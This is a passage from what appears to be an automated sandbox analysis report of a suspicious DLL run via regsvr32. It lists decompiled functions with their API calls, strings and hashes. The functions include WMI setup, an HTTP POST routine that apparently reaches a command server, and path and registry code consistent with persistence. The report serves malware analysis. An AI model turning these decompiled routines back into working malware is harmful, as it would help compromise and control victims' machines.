									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

FALSE, xrefs: 1000DDAE
TRUE, xrefs: 1000DDA7

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

CryptGenRandom, xrefs: 100116EC
advapi32.dll, xrefs: 100116C3
CryptAcquireContextA, xrefs: 100116DD
CryptReleaseContext, xrefs: 100116FB

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

null, xrefs: 100102F7
false, xrefs: 10010315
true, xrefs: 10010309
%I64d, xrefs: 10010324

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x1820590
					_t125 =  *0x1001e68c; // 0x189fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x1820590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x1820590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x1820590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x1820590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x18207b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x1820590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x189faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x189faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10010865
\u%04X\u%04X, xrefs: 10010950
\u%04X, xrefs: 10010911

